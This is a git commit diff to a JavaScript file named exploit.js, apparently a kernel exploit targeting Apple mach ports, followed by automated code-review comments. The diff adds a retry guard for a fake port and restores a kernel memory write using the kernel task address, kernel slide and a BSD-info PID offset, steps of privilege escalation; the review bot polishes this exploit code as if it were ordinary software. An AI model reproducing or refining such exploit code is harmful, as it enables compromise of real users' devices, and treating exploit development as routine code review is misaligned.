authorspv420 <spv@spv.sh>2022-07-29 12:54:14 -0400
committerspv420 <spv@spv.sh>2022-07-29 12:54:14 -0400
commitafd32c3f9934e6425a77ed4b5a185b8fd6cb69a3 (patch)
tree78a68a8505bc2d22ae3db3ebeab9e3627765e44d
parent5ffc1a10b206f367c135330405833d7c59de56cb (diff)
aaaaaaaa
-rwxr-xr-xsrc/js/kexp/exploit.js10
1 files changed, 7 insertions, 3 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e854ba0..fbca86c 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,7 +496,11 @@ again: while (true) {
*/
// var fake_port = mach_ports_lookup_shit();
printf("fuck\n");
- printf("%x\n", fake_port);
+ if (fake_port === 0 || fake_port === 0xffffffff) {
+ printf("fuck. fake port is fucked.\n");
+ continue again;
+ }
+ scall("printf", "%x\n", fake_port);
printf("fuck\n");
// todo: add mach_port_valid stuff
printf("fuck\n");
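Review bot: The new guard on `fake_port` partly addresses the `// todo: add mach_port_valid stuff` comment two lines below it, but that comment is left as-is, so it now reads as if no check exists at all; it should be reworded to say what the guard covers and what is still outstanding, e.g. `// todo: the 0 / 0xffffffff guard above is only a placeholder for a real validity check`. The replaced line also switches from `printf("%x\n", fake_port)` to `scall("printf", "%x\n", fake_port)` while every neighbouring line keeps calling `printf` directly; if `scall` is needed on this line for a reason (presumably a different formatting path), a one-line comment saying so would stop a later cleanup from reverting it. The `continue again` re-enters the enclosing `again: while (true)` loop with no attempt limit, so a value that is always 0 or 0xffffffff loops forever with only the preceding message as a trace. The enclosing loop starts before this hunk.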
@@ -504,8 +508,8 @@ again: while (true) {
printf("fuck\n");
write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
-// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x73707621);
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
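Review bot: The added line `// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);` is commented-out code kept next to the live call it replaces; it carries an undocumented constant and will rot as the live line changes, so either drop it or turn it into a comment that states what that value was used for (it looks like a test marker, but that is an inference from the hunk, not something the page states). The live `write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);` line now depends on `find_kerneltask()` and `kslide`, and the four identical `printf("fuck\n")` traces around it give no indication of which step was reached if it fails; distinct messages per step would make the trace useful.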